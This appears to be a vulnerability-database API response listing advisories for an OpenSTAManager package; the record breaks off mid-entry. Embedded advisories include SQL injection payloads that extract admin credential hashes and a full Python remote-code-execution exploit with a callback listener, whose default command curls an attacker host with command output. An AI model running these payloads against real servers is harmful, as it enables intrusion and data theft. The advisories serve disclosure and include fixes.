Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/898427?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/898427?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.4.25", "type": "composer", "namespace": "devcode-it", "name": "openstamanager", "version": "2.4.25", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "2.10.2", "latest_non_vulnerable_version": "2.10.2", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49991?format=api", "vulnerability_id": "VCID-2br1-99zg-z7bh", "summary": "OpenSTAManager has a SQL Injection in ajax_complete.php (get_sedi endpoint)\nA SQL Injection vulnerability exists in the `ajax_complete.php` endpoint when handling the `get_sedi` operation. An authenticated attacker can inject malicious SQL code through the `idanagrafica` parameter, leading to unauthorized database access.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69213", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00045", "scoring_system": "epss", "scoring_elements": "0.14353", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18503", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18585", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18623", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-69213" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69213", "reference_id": "CVE-2025-69213", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69213" }, { "reference_url": "https://github.com/advisories/GHSA-w995-ff8h-rppg", "reference_id": "GHSA-w995-ff8h-rppg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w995-ff8h-rppg" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg", "reference_id": "GHSA-w995-ff8h-rppg", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-04T19:32:28Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-w995-ff8h-rppg" } ], "fixed_packages": [], "aliases": [ "CVE-2025-69213", "GHSA-w995-ff8h-rppg" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2br1-99zg-z7bh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89765?format=api", "vulnerability_id": "VCID-5srf-wjj5-z3fj", "summary": "OpenSTAManager has a SQL Injection via righe Parameter in confronta_righe Modals\n## Description\n\nSix `confronta_righe.php` files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The `righe` parameter received via `$_GET['righe']` is directly concatenated into an SQL query without any sanitization, parameterization or validation.\n\nAn authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.\n\n## Affected Files\n\nAll 6 vulnerable files share the same code pattern:\n\n| # | File | Line | Affected Table |\n|---|------|------|----------------|\n| 1 | `modules/fatture/modals/confronta_righe.php` | 29 | `co_righe_documenti` |\n| 2 | `modules/interventi/modals/confronta_righe.php` | 29 | `in_righe_interventi` |\n| 3 | `modules/preventivi/modals/confronta_righe.php` | 28 | `co_righe_preventivi` |\n| 4 | `modules/ordini/modals/confronta_righe.php` | 29 | `or_righe_ordini` |\n| 5 | `modules/ddt/modals/confronta_righe.php` | 29 | `dt_righe_ddt` |\n| 6 | `modules/contratti/modals/confronta_righe.php` | 28 | `co_righe_contratti` |\n\n## Vulnerable Code\n\nAll files follow the same pattern. Example from `modules/interventi/modals/confronta_righe.php`:\n\n```php\n$righe = $_GET['righe']; // Line 29 — No sanitization\n\n$righe = $dbo->fetchArray(\n 'SELECT\n `mg_articoli_lang`.`title`,\n `mg_articoli`.`codice`,\n `in_righe_interventi`.*\n FROM\n `in_righe_interventi`\n INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`\n LEFT JOIN `mg_articoli_lang` ON (...)\n WHERE\n `in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 — Direct concatenation\n);\n```\n\nThe value of `$_GET['righe']` is inserted directly into the SQL `IN()` clause without using `prepare()`, parameterized statements or any sanitization function.\n\n## Reproduction\n\n### Prerequisites\n\n- Authenticated session (any user with module access)\n- At least one existing record in the target module (e.g. an intervention with id=1)\n\n### Step 1: Extract MySQL version\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23\n```\n\n**Result:** `XPATH syntax error: '~8.3.0'`\n\n### Step 2: Extract database user\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23\n```\n\n**Result:** `XPATH syntax error: '~root@172.19.0.3'`\n\n### Step 3: Extract admin credentials\n\n```\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23\n```\n\n**Result:** `XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'`\n\n### Evidence\n\n<img width=\"1254\" height=\"395\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a2367ed6-fa03-4668-9d74-4298cac5e429\" />\n\n\n### HTTP Request\n\n```http\nGET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1\nHost: <TARGET>\nCookie: PHPSESSID=<SESSION_ID>\n```\n\n### Response (excerpt)\n\n```\nSQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'\n```\n\n## Impact\n\n- **Confidentiality (High):** Full database data extraction including user credentials (bcrypt hashes), customer data, invoices, contracts and any stored information\n- **Integrity (High):** Data modification via injected INSERT/UPDATE/DELETE statements through stacked queries or subqueries\n- **Availability (High):** Deletion of tables or critical data, database corruption\n\n## Remediation\n\n### Recommended Fix\n\nUse parameterized statements with `prepare()` for the `righe` parameter:\n\n```php\n// BEFORE (vulnerable):\n$righe = $_GET['righe'];\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'\n);\n\n// AFTER (secure):\n$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));\n$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));\n$righe = $dbo->fetchArray(\n '... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',\n $righe_ids\n);\n```\n\nThis fix must be applied to all **6 files** listed in the \"Affected Files\" section.\n\n## Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35470", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02903", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02841", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02857", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0291", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35470" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T14:06:23Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T14:06:23Z/" } ], "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-mmm5-3g4x-qw39" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35470", "reference_id": "CVE-2026-35470", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35470" }, { "reference_url": "https://github.com/advisories/GHSA-mmm5-3g4x-qw39", "reference_id": "GHSA-mmm5-3g4x-qw39", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mmm5-3g4x-qw39" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110583?format=api", "purl": "pkg:composer/devcode-it/openstamanager@2.10.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/devcode-it/openstamanager@2.10.2" } ], "aliases": [ "CVE-2026-35470", "GHSA-mmm5-3g4x-qw39" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5srf-wjj5-z3fj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89672?format=api", "vulnerability_id": "VCID-5tn6-au4e-33de", "summary": "OpenSTAManager Affected by Remote Code Execution via Insecure Deserialization in OAuth2\n## Description\n\nThe `oauth2.php` file in OpenSTAManager is an **unauthenticated** endpoint (`$skip_permissions = true`). It loads a record from the `zz_oauth2` table using the attacker-controlled GET parameter `state`, and during the OAuth2 configuration flow calls `unserialize()` on the `access_token` field **without any class restriction**.\n\nAn attacker who can write to the `zz_oauth2` table (e.g., via the arbitrary SQL injection in the Aggiornamenti module reported in [GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) can insert a malicious serialized PHP object (gadget chain) that upon deserialization executes arbitrary commands on the server as the `www-data` user.\n\n## Affected code\n\n### Entry point — `oauth2.php`\n\n```php\n$skip_permissions = true; // Line 23: NO AUTHENTICATION\ninclude_once __DIR__.'/core.php';\n\n$state = $_GET['state']; // Line 28: attacker-controlled\n$code = $_GET['code'];\n\n$account = OAuth2::where('state', '=', $state)->first(); // Line 33: fetches injected record\n$response = $account->configure($code, $state); // Line 51: triggers the chain\n```\n\n### Deserialization — `src/Models/OAuth2.php`\n\n```php\n// Line 193 (checkTokens):\n$access_token = $this->access_token ? unserialize($this->access_token) : null;\n\n// Line 151 (getAccessToken):\nreturn $this->attributes['access_token'] ? unserialize($this->attributes['access_token']) : null;\n```\n\n`unserialize()` is called without the `allowed_classes` parameter, allowing instantiation of any class loaded by the Composer autoloader.\n\n## Execution flow\n\n```\noauth2.php (no auth)\n → configure()\n → needsConfiguration()\n → getAccessToken()\n → checkTokens()\n → unserialize($this->access_token) ← attacker payload\n → Creates PendingBroadcast object (Laravel/RCE22 gadget chain)\n → $access_token->hasExpired() ← PendingBroadcast lacks this method → PHP Error\n → During error cleanup:\n → PendingBroadcast.__destruct() ← fires during shutdown\n → system($command) ← RCE\n```\n\nThe HTTP response is 500 (due to the `hasExpired()` error), but the command has already executed via `__destruct()` during error cleanup.\n\n## Full attack chain\n\nThis vulnerability is combined with the arbitrary SQL injection in the Aggiornamenti module ([GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) to achieve unauthenticated RCE:\n\n1. **Payload injection** (requires admin account): Via `op=risolvi-conflitti-database`, arbitrary SQL is executed to insert a malicious serialized object into `zz_oauth2.access_token`\n2. **RCE trigger** (unauthenticated): A GET request to `oauth2.php?state=<known_value>&code=x` triggers the deserialization and executes the command\n\n**Persistence note**: The `risolvi-conflitti-database` handler ends with `exit;` (line 128), which prevents the outer transaction commit. DML statements (INSERT) would be rolled back. To persist the INSERT, DDL statements (`CREATE TABLE`/`DROP TABLE`) are included to force an implicit MySQL commit.\n\n## Gadget chain\n\nThe chain used is **Laravel/RCE22** (available in [phpggc](https://github.com/ambionics/phpggc)) which exploits classes from the Laravel framework present in the project's dependencies:\n\n```\nPendingBroadcast.__destruct()\n → $this->events->dispatch($this->event)\n → chain of __call() / __invoke()\n → system($command)\n```\n\n## Proof of Concept\n\n### Execution\n\n**Terminal 1** — Attacker listener:\n```bash\npython3 listener.py --port 9999\n```\n\n**Terminal 2** — Exploit:\n```bash\npython3 exploit.py \\\n --target http://localhost:8888 \\\n --callback http://host.docker.internal:9999 \\\n --user admin --password <password>\n```\n<img width=\"638\" height=\"722\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e949b641-7986-44b9-acbf-1c5dd0f7ef1f\" />\n\n### Observed result\n\n**Listener receives:**\n<img width=\"683\" height=\"286\" alt=\"image\" src=\"https://github.com/user-attachments/assets/89a78f7e-5f23-435d-97ec-d74ac905cdc1\" />\nThe `id` command was executed on the server as `www-data`, confirming RCE.\n\n### HTTP requests from the exploit\n\n**Step 4 — Injection (authenticated):**\n```\nPOST /actions.php HTTP/1.1\nCookie: PHPSESSID=<session>\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database&id_module=6&queries=[\"DELETE FROM zz_oauth2 WHERE state='poc-xxx'\",\"INSERT INTO zz_oauth2 (id,name,class,client_id,client_secret,config,state,access_token,after_configuration,is_login,enabled) VALUES (99999,'poc','Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google','x','x','{}','poc-xxx',0x<payload_hex>,'',0,1)\",\"CREATE TABLE IF NOT EXISTS _t(i INT)\",\"DROP TABLE IF EXISTS _t\"]\n```\n\n**Step 5 — Trigger (NO authentication):**\n```\nGET /oauth2.php?state=poc-xxx&code=x HTTP/1.1\n\n(No cookies — completely anonymous request)\n```\n\n**Response:** HTTP 500 (expected — the error occurs after `__destruct()` has already executed the command)\n\n### Exploit — `exploit.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOpenSTAManager v2.10.1 — RCE PoC (Arbitrary SQL → Insecure Deserialization)\n\nUsage:\n python3 listener.py --port 9999\n python3 exploit.py --target http://localhost:8888 --callback http://host.docker.internal:9999 --user admin --password Test1234\n\"\"\"\n\nimport argparse\nimport json\nimport random\nimport re\nimport string\nimport subprocess\nimport sys\nimport time\n\ntry:\n import requests\nexcept ImportError:\n print(\"[!] pip install requests\")\n sys.exit(1)\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\nRESET = \"\\033[0m\"\n\nBANNER = f\"\"\"\n {RED}{'=' * 58}{RESET}\n {RED}{BOLD} OpenSTAManager v2.10.1 — RCE Proof of Concept{RESET}\n {RED}{BOLD} Arbitrary SQL → Insecure Deserialization{RESET}\n {RED}{'=' * 58}{RESET}\n\"\"\"\n\n\ndef log(msg, status=\"*\"):\n icons = {\"*\": f\"{BLUE}*{RESET}\", \"+\": f\"{GREEN}+{RESET}\", \"-\": f\"{RED}-{RESET}\", \"!\": f\"{YELLOW}!{RESET}\"}\n print(f\" [{icons.get(status, '*')}] {msg}\")\n\n\ndef step_header(num, title):\n print(f\"\\n {BOLD}── Step {num}: {title} ──{RESET}\\n\")\n\n\ndef generate_payload(container, command):\n step_header(1, \"Generate Gadget Chain Payload\")\n\n log(\"Checking phpggc in container...\")\n result = subprocess.run([\"docker\", \"exec\", container, \"test\", \"-f\", \"/tmp/phpggc/phpggc\"], capture_output=True)\n if result.returncode != 0:\n log(\"Installing phpggc...\", \"!\")\n proc = subprocess.run(\n [\"docker\", \"exec\", container, \"git\", \"clone\", \"https://github.com/ambionics/phpggc\", \"/tmp/phpggc\"],\n capture_output=True, text=True,\n )\n if proc.returncode != 0:\n log(f\"Failed to install phpggc: {proc.stderr}\", \"-\")\n sys.exit(1)\n\n log(f\"Command: {DIM}{command}{RESET}\")\n\n result = subprocess.run(\n [\"docker\", \"exec\", container, \"php\", \"/tmp/phpggc/phpggc\", \"Laravel/RCE22\", \"system\", command],\n capture_output=True,\n )\n if result.returncode != 0:\n log(f\"phpggc failed: {result.stderr.decode()}\", \"-\")\n sys.exit(1)\n\n payload_bytes = result.stdout\n log(f\"Payload: {BOLD}{len(payload_bytes)} bytes{RESET}\", \"+\")\n return payload_bytes\n\n\ndef authenticate(target, username, password):\n step_header(2, \"Authenticate\")\n session = requests.Session()\n log(f\"Logging in as '{username}'...\")\n\n resp = session.post(\n f\"{target}/index.php\",\n data={\"op\": \"login\", \"username\": username, \"password\": password},\n allow_redirects=False, timeout=10,\n )\n\n location = resp.headers.get(\"Location\", \"\")\n if resp.status_code != 302 or \"index.php\" in location:\n log(\"Login failed! Wrong credentials or brute-force lockout (3 attempts / 180s).\", \"-\")\n sys.exit(1)\n\n session.get(f\"{target}{location}\", timeout=10)\n log(\"Authenticated\", \"+\")\n return session\n\n\ndef find_module_id(session, target, container):\n step_header(3, \"Find 'Aggiornamenti' Module ID\")\n log(\"Searching navigation sidebar...\")\n resp = session.get(f\"{target}/controller.php\", timeout=10)\n\n for match in re.finditer(r'id_module=(\\d+)', resp.text):\n snippet = resp.text[match.start():match.start() + 300]\n if re.search(r'[Aa]ggiornamenti', snippet):\n module_id = int(match.group(1))\n log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n return module_id\n\n log(\"Not found in sidebar, querying database...\", \"!\")\n result = subprocess.run(\n [\"docker\", \"exec\", container, \"php\", \"-r\",\n \"require '/var/www/html/config.inc.php'; \"\n \"$pdo = new PDO('mysql:host='.$db_host.';dbname='.$db_name, $db_username, $db_password); \"\n \"echo $pdo->query(\\\"SELECT id FROM zz_modules WHERE name='Aggiornamenti'\\\")->fetchColumn();\"],\n capture_output=True, text=True,\n )\n if result.stdout.strip().isdigit():\n module_id = int(result.stdout.strip())\n log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n return module_id\n\n log(\"Could not find module ID\", \"-\")\n sys.exit(1)\n\n\ndef inject_payload(session, target, module_id, payload_bytes, state_value):\n step_header(4, \"Inject Payload via Arbitrary SQL\")\n\n hex_payload = payload_bytes.hex()\n record_id = random.randint(90000, 99999)\n\n queries = [\n f\"DELETE FROM zz_oauth2 WHERE id={record_id} OR state='{state_value}'\",\n f\"INSERT INTO zz_oauth2 \"\n f\"(id, name, class, client_id, client_secret, config, \"\n f\"state, access_token, after_configuration, is_login, enabled) VALUES \"\n f\"({record_id}, 'poc', 'Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google', \"\n f\"'x', 'x', '{{}}', '{state_value}', 0x{hex_payload}, '', 0, 1)\",\n \"CREATE TABLE IF NOT EXISTS _poc_ddl_commit (i INT)\",\n \"DROP TABLE IF EXISTS _poc_ddl_commit\",\n ]\n\n log(f\"State trigger: {BOLD}{state_value}{RESET}\")\n log(f\"Payload: {len(hex_payload)//2} bytes ({len(hex_payload)} hex)\")\n log(\"Sending to actions.php...\")\n\n resp = session.post(\n f\"{target}/actions.php\",\n data={\"op\": \"risolvi-conflitti-database\", \"id_module\": str(module_id), \"id_record\": \"\", \"queries\": json.dumps(queries)},\n timeout=15,\n )\n\n try:\n result = json.loads(resp.text)\n if result.get(\"success\"):\n log(\"Payload planted in zz_oauth2.access_token\", \"+\")\n return True\n else:\n log(f\"Injection failed: {result.get('message', '?')}\", \"-\")\n return False\n except json.JSONDecodeError:\n log(f\"Unexpected response (HTTP {resp.status_code}): {resp.text[:200]}\", \"-\")\n return False\n\n\ndef trigger_rce(target, state_value):\n step_header(5, \"Trigger RCE (NO AUTHENTICATION)\")\n\n url = f\"{target}/oauth2.php\"\n log(f\"GET {url}?state={state_value}&code=x\")\n log(f\"{DIM}(This request is UNAUTHENTICATED){RESET}\")\n\n try:\n resp = requests.get(url, params={\"state\": state_value, \"code\": \"x\"}, allow_redirects=False, timeout=15)\n log(f\"HTTP {resp.status_code}\", \"+\")\n if resp.status_code == 500:\n log(f\"{DIM}500 expected: __destruct() fires the gadget chain before error handling{RESET}\")\n except requests.exceptions.Timeout:\n log(\"Timed out (command may still have executed)\", \"!\")\n except requests.exceptions.ConnectionError as e:\n log(f\"Connection error: {e}\", \"-\")\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"OpenSTAManager v2.10.1 — RCE PoC\")\n parser.add_argument(\"--target\", required=True, help=\"Target URL\")\n parser.add_argument(\"--callback\", required=True, help=\"Attacker listener URL reachable from the container\")\n parser.add_argument(\"--user\", default=\"admin\", help=\"Username (default: admin)\")\n parser.add_argument(\"--password\", required=True, help=\"Password\")\n parser.add_argument(\"--container\", default=\"osm-web\", help=\"Docker web container (default: osm-web)\")\n parser.add_argument(\"--command\", help=\"Custom command (default: curl callback with id output)\")\n args = parser.parse_args()\n\n print(BANNER)\n\n target = args.target.rstrip(\"/\")\n callback = args.callback.rstrip(\"/\")\n state_value = \"poc-\" + \"\".join(random.choices(string.ascii_lowercase + string.digits, k=12))\n command = args.command or f\"curl -s {callback}/rce-$(id|base64 -w0)\"\n\n payload = generate_payload(args.container, command)\n session = authenticate(target, args.user, args.password)\n module_id = find_module_id(session, target, args.container)\n\n if not inject_payload(session, target, module_id, payload, state_value):\n log(\"Exploit failed at injection step\", \"-\")\n sys.exit(1)\n\n time.sleep(1)\n trigger_rce(target, state_value)\n\n print(f\"\\n {BOLD}── Result ──{RESET}\\n\")\n log(\"Exploit complete. Check your listener for the callback.\", \"+\")\n log(\"Expected: GET /rce-<base64(id)>\")\n log(f\"If no callback, verify the container can reach: {callback}\", \"!\")\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n### Listener — `listener.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"OpenSTAManager v2.10.1 — RCE Callback Listener\"\"\"\n\nimport argparse\nimport base64\nimport sys\nfrom datetime import datetime\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\n\nclass CallbackHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n ts = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n print(f\"\\n {RED}{'=' * 58}{RESET}\")\n print(f\" {RED}{BOLD} RCE CALLBACK RECEIVED{RESET}\")\n print(f\" {RED}{'=' * 58}{RESET}\")\n print(f\" {GREEN}[+]{RESET} Time : {ts}\")\n print(f\" {GREEN}[+]{RESET} From : {self.client_address[0]}:{self.client_address[1]}\")\n print(f\" {GREEN}[+]{RESET} Path : {self.path}\")\n\n for part in self.path.lstrip(\"/\").split(\"/\"):\n if part.startswith(\"rce-\"):\n try:\n decoded = base64.b64decode(part[4:]).decode(\"utf-8\", errors=\"replace\")\n print(f\" {GREEN}[+]{RESET} Output : {BOLD}{decoded}{RESET}\")\n except Exception:\n print(f\" {YELLOW}[!]{RESET} Raw : {part[4:]}\")\n\n print(f\" {RED}{'=' * 58}{RESET}\\n\")\n self.send_response(200)\n self.send_header(\"Content-Type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(b\"OK\")\n\n def do_POST(self):\n self.do_GET()\n\n def log_message(self, format, *args):\n pass\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"RCE callback listener\")\n parser.add_argument(\"--port\", type=int, default=9999, help=\"Listen port (default: 9999)\")\n args = parser.parse_args()\n\n server = HTTPServer((\"0.0.0.0\", args.port), CallbackHandler)\n print(f\"\\n {BLUE}{'=' * 58}{RESET}\")\n print(f\" {BLUE}{BOLD} OpenSTAManager v2.10.1 — RCE Callback Listener{RESET}\")\n print(f\" {BLUE}{'=' * 58}{RESET}\")\n print(f\" {GREEN}[+]{RESET} Listening on 0.0.0.0:{args.port}\")\n print(f\" {YELLOW}[!]{RESET} Waiting for callback...\\n\")\n\n try:\n server.serve_forever()\n except KeyboardInterrupt:\n print(f\"\\n {YELLOW}[!]{RESET} Stopped.\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Impact\n\n- **Confidentiality**: Read server files, database credentials, API keys\n- **Integrity**: Write files, install backdoors, modify application code\n- **Availability**: Delete files, denial of service\n- **Scope**: Command execution as `www-data` allows pivoting to other systems on the network\n\n## Proposed remediation\n\n### Option A: Restrict `unserialize()` (recommended)\n\n```php\n// src/Models/OAuth2.php — checkTokens() and getAccessToken()\n$access_token = $this->access_token\n ? unserialize($this->access_token, ['allowed_classes' => [AccessToken::class]])\n : null;\n```\n\n### Option B: Use safe serialization\n\nReplace `serialize()`/`unserialize()` with `json_encode()`/`json_decode()` for storing OAuth2 tokens.\n\n### Option C: Authenticate `oauth2.php`\n\nRemove `$skip_permissions = true` and require authentication for the OAuth2 callback endpoint, or validate the `state` parameter against a value stored in the user's session.\n\n## Credits\nOmar Ramirez", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29782", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22866", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22919", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22964", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00076", "scoring_system": "epss", "scoring_elements": "0.22979", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29782" }, { "reference_url": "https://github.com/devcode-it/openstamanager", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/devcode-it/openstamanager" }, { "reference_url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-03T19:52:40Z/" } ], "url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc" }, { "reference_url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-03T19:52:40Z/" } ], "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2" }, { "reference_url": 